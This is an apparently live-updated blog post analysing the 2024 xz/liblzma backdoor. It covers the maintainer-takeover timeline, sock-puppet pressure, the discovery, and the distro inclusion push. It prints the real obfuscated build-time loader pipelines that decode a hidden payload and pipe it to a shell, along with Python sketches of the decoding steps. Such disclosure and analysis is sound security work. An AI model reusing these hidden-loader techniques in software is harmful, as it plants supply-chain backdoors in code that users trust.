Everything I Know About the Xz Backdoor

state: unstable
in: blog
date: 3/29/2024

😖 Unstable

Updating at the speed of light, blink once and a word could be gone! These nodes are erratic, unstable, dangerous, but that's why they are fun.

Please note: This is being updated in real time. The intent is to make sense of lots of simultaneous discoveries regarding this backdoor. Last updated: 1:00 AM EST

Update: The GitHub page for xz has been suspended.

2021

JiaT75 (Jia Tan) creates their GitHub account.

The first commits they make are not to xz, but they are deeply suspicious. Specifically, they open a PR in libarchive: Added error text to warning when untaring with bsdtar. This commit does a little more than it says. It replaces safe_fprintf with an unsafe variant, potentially introducing another vulnerability. The code was merged without any discussion, and ~~lives on to this day~~ (patched). libarchive should also be considered compromised until proven otherwise.

2022

In April 2022, Jia Tan submits a patch via a mailing list. The patch itself is unimportant, but the events that follow are not. A new persona, Jigar Kumar, enters and begins pressuring for this patch to be merged.

Soon after, Jigar Kumar begins pressuring Lasse Collin to add another maintainer to XZ. In the fallout, we learn a little bit about mental health in open source.

Three days after the emails pressuring Lasse Collin to add another maintainer, JiaT75 makes their first commit to xz: Tests: Created tests for hardware functions. Since this commit, they have become a regular contributor to xz (they are currently the second most active). It's unclear exactly when they became trusted in this repository.

Jigar Kumar is never seen again.

Glyph ^{@glyph@mastodon.social}

@eb I really hope that this causes an industry-wide reckoning with the common practice of letting your entire goddamn product rest on the shoulders of one overworked person having a slow mental health crisis without financially or operationally supporting them whatsoever. I want everyone who has an open source dependency to read this message
https://www.mail-archive.com/xz-devel@tukaani.org/msg00567.html

^{Mar 29, 2024, 20:43} ^{295 retoots}

2023

JiaT75 merges their first commit on Jan 7 2023¹, which gives us a good indication of when they fully gained trust.

In March, the primary contact email in Google's oss-fuzz is updated to be Jia's, instead of Lasse Collin's.

Testing infrastructure that will be used in this exploit is committed. Despite Lasse Collin being attributed as the author for this, Jia Tan committed it, and it was originally written by Hans Jansen in June:

Commit: liblzma: Add ifunc implementation to crc64_fast.c
PR: Replaced crc64_fast constructor with ifunc by hansjans162

Hans Jansen’s account was seemingly made specifically to create this pull request. There is very little activity before and after. They will later push for the compromised version of XZ to be included in Debian.

In July, a PR was opened in oss-fuzz to disable ifunc for fuzzing builds, due to issues introduced by the changes above. This appears to be deliberate to mask the malicious changes that will be introduced soon.

2024

A pull request for Google's oss-fuzz is opened that changes the URL for the project from tukaani.org/xz/ to xz.tukaani.org/xz-utils/. tukaani.org is hosted at 5.44.245.25 in Finland, at this hosting company. The xz subdomain, meanwhile, points to GitHub pages. This further increases the control Jia has over the project.

A commit containing the final steps required to execute this backdoor is added to the repository:

The discovery

An email is sent to the oss-security mailing list: backdoor in upstream xz/liblzma leading to ssh server compromise, announcing this discovery, and doing its best to explain the exploit chain.

AndresFreundTec ^{@AndresFreundTec@mastodon.social}

I was doing some micro-benchmarking at the time, needed to quiesce the system to reduce noise. Saw sshd processes were using a surprising amount of CPU, despite immediately failing because of wrong usernames etc. Profiled sshd, showing lots of cpu time in liblzma, with perf unable to attribute it to a symbol. Got suspicious. Recalled that I had seen an odd valgrind complaint in automated testing of postgres, a few weeks earlier, after package updates.

Really required a lot of coincidences.

^{Mar 29, 2024, 18:32} ^{346 retoots}

A gist has been published with a very good high level technical overview and a “what you need to know”

I understand this chain even less than the original author, but here is me half reciting, half making sense of what’s happening:

This isn't good yet, I'm still figuring it out

Code is added to the upstream tarballs that injects an obfuscated script from the files committed above to be “executed at the end of configure”. This code, in turn, “modifies $builddir/src/liblzma/Makefile to contain”

am__test = bad-3-corrupt_lzma2.xz
...
am__test_dir=$(top_srcdir)/tests/files/$(am__test)
...
sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1

(you’ll notice this was the file added above) “which ends up as” (what ends up as?)

sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "	 \-_" " 	_\-" | xz -d | /bin/bash >/dev/null 2>&1;
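As far as I can tell, the `tr` in that pipeline is a plain character swap: tabs and spaces trade places, and so do `-` and `_`. Presumably that is what turns the "corrupt" test file back into something `xz -d` will accept. Here is a minimal Python sketch of just that substitution. The sample input is made up for illustration and is not taken from the real test file.

```python
# Mirrors the shell stage: tr "\t \-_" " \t_\-"
# tab <-> space and '-' <-> '_'; every other byte passes through unchanged.
SWAP = bytes.maketrans(b"\t -_", b" \t_-")


def unswap(data: bytes) -> bytes:
    """Apply the same byte-for-byte substitution as the tr call."""
    return data.translate(SWAP)


sample = b"a-b_c d\te"  # hypothetical input, not bytes from the real file
print(unswap(sample))
# The mapping is its own inverse, so applying it twice restores the input.
print(unswap(unswap(sample)) == sample)
```

Because the swap is symmetric, the same command could have been used both to "corrupt" the file and to restore it.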

The sed reportedly transforms into

####Hello####
#��Z�.hj�
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####
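Reading the `i` variable in the script above: each `(head -c +1024 >/dev/null) && head -c +2048` pair throws away 1024 bytes and passes the next 2048 through, and the chain ends with one more 1024-byte skip followed by a 724-byte read. A rough Python sketch of that carving, under the assumption that each `head` consumes exactly the bytes it is asked for. The function name and the `rounds` parameter are mine, so count the repetitions in the original rather than trusting any number here.

```python
import io


def carve(stream, rounds, skip=1024, keep=2048, tail=724):
    """Alternately discard `skip` bytes and keep `keep` bytes, `rounds` times,
    then discard `skip` once more and keep a final `tail` bytes."""
    out = bytearray()
    for _ in range(rounds):
        stream.read(skip)          # (head -c +1024 >/dev/null)
        out += stream.read(keep)   # head -c +2048
    stream.read(skip)              # last skip before the short read
    out += stream.read(tail)       # head -c +724
    return bytes(out)


# Toy input with tiny sizes so the effect is visible: dots are discarded.
toy = io.BytesIO(b"..AAA..BBB..Ctrailing")
print(carve(toy, rounds=2, skip=2, keep=3, tail=1))
```

The point of the pattern seems to be that the payload is scattered through the file in chunks, with filler in between.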

You’ll notice this script is piping one of these files attached in the above commits into a series of very very obfuscated head calls. And after deobfuscation of this script, it leads to a sh file attached in the email:

injected.txt
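The second `tr` in that script, the one with the octal ranges, looks like a byte-level substitution cipher: the six ranges in the first argument cover all 256 byte values exactly once, and they are mapped in order onto `\0-\377`. Here is a small Python sketch that rebuilds the table, assuming `tr` expands the ranges left to right in the order written. The function names are mine.

```python
def build_table() -> bytes:
    """Rebuild the mapping of tr "\\5-\\51\\204-\\377\\52-\\115\\132-\\203\\0-\\4\\116-\\131" "\\0-\\377"."""
    # Source ranges in the order they appear in the script (octal, inclusive).
    ranges = [
        (0o5, 0o51), (0o204, 0o377), (0o52, 0o115),
        (0o132, 0o203), (0o0, 0o4), (0o116, 0o131),
    ]
    src = bytes(b for lo, hi in ranges for b in range(lo, hi + 1))
    # Sanity check: the ranges form a permutation of all byte values.
    assert len(src) == 256 and len(set(src)) == 256
    return bytes.maketrans(src, bytes(range(256)))


TABLE = build_table()


def decode(data: bytes) -> bytes:
    """Apply the substitution to a byte string."""
    return data.translate(TABLE)


# First and last byte of a few source ranges, to show where they land.
print(list(decode(bytes([0o5, 0o51, 0o204, 0o0, 0o131]))))
```

In the script, the output of this stage is fed to `xz -F raw --lzma1 -dc`, so the substitution only has to undo whatever scrambling was applied to the raw LZMA stream.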

There are a number of conditions identified that are required for the process to continue:

Building with gcc and the GNU linker
Only x86-64 Linux
Running as part of a Debian or RPM package build

The final binary reportedly is used in some way to bypass sshd authentication checks.

A sudden push for inclusion

A request for the vulnerable version to be included in Debian is opened by Hans:

#1067708 - xz-utils: New upstream version available

This request was opened the same week Hans’ Debian account was created. The account created a few similar “update” requests in various low traffic repositories to build credibility, before asking for this one.

A number of other suspicious, anonymous name+number accounts with little prior activity also push for its inclusion, including misoeater91 and krygorin4545. krygorin4545's PGP key was made 2 days prior to today.

Also seeing this bug. Extra valgrind output causes some failed tests for me. Looks like the new version will resolve it. Would like this new version so I can continue work.

I noticed this last week and almost made a valgrind bug. Glad to see it being fixed.
Thanks Hans!

The Valgrind bugs mentioned were introduced by this malicious injection, as noted in the email to OSS-Security:

Subsequently the injected code (more about that below) caused valgrind errors and crashes in some configurations, due the stack layout differing from what the backdoor was expecting. These issues were attempted to be worked around in 5.6.1:

A pull request to a Go library is opened by a 1Password employee, asking to upgrade the library to the vulnerable version. However, it was all unfortunate timing. 1Password reached out by email referring me to this comment, and everything seems to check out.

A Fedora contributor states that Jia was pushing for its inclusion in Fedora as it contains “great new features”.

Jia Tan also attempted to get it into Ubuntu days before the beta freeze.

As of 9:00 PM UTC, GitHub has suspended JiaT75’s account. Thanks? They also banned the repository, meaning people can no longer audit the changes made to it without resorting to mirrors. Immensely helpful, GitHub. They also suspended Lasse Collin’s account, which is completely disgraceful.

Important notes on LinkedIn

I have received a few emails alerting me to a LinkedIn of somebody named Jia Tan². Their bio boasts of large-scale vulnerability management. They claim to live in California. Is this our man? The commits on JiaT75’s GitHub are set to +0800, which would not indicate presence in California. This may have been a bad attempt to set the timezone to UTC-0800, which would be California. Most of the commits were made between UTC 12-17, which is awfully early for California. In my opinion, there is not sufficient evidence that the LinkedIn being discussed is our man. I think identity theft is more likely, but I am of course open to more evidence.
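To make the timezone arithmetic concrete, here is a small Python sketch that converts the two ends of that UTC window into local wall-clock hours for both offsets. The date is arbitrary, and I am treating California as a fixed UTC-8, which ignores daylight saving time (UTC-7 in summer).

```python
from datetime import datetime, timedelta, timezone

UTC_PLUS_8 = timezone(timedelta(hours=8))    # offset recorded in the commits
UTC_MINUS_8 = timezone(timedelta(hours=-8))  # California standard time (assumption: no DST)


def local_hour(utc_hour: int, tz: timezone) -> int:
    """Wall-clock hour in `tz` for something that happened at `utc_hour` UTC."""
    moment = datetime(2024, 1, 15, utc_hour, tzinfo=timezone.utc)  # arbitrary date
    return moment.astimezone(tz).hour


for hour in (12, 17):
    print(f"{hour}:00 UTC -> {local_hour(hour, UTC_PLUS_8)}:00 at +0800, "
          f"{local_hour(hour, UTC_MINUS_8)}:00 at -0800")
```

So a 12 to 17 UTC window is roughly 4 AM to 9 AM at UTC-8, and roughly 8 PM to 1 AM at UTC+8.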

👟 Footnotes

¹ Thanks @joeyh@hachyderm.io
² I was also alerted to discussions of this on Gab, which should tell you what you need to know.

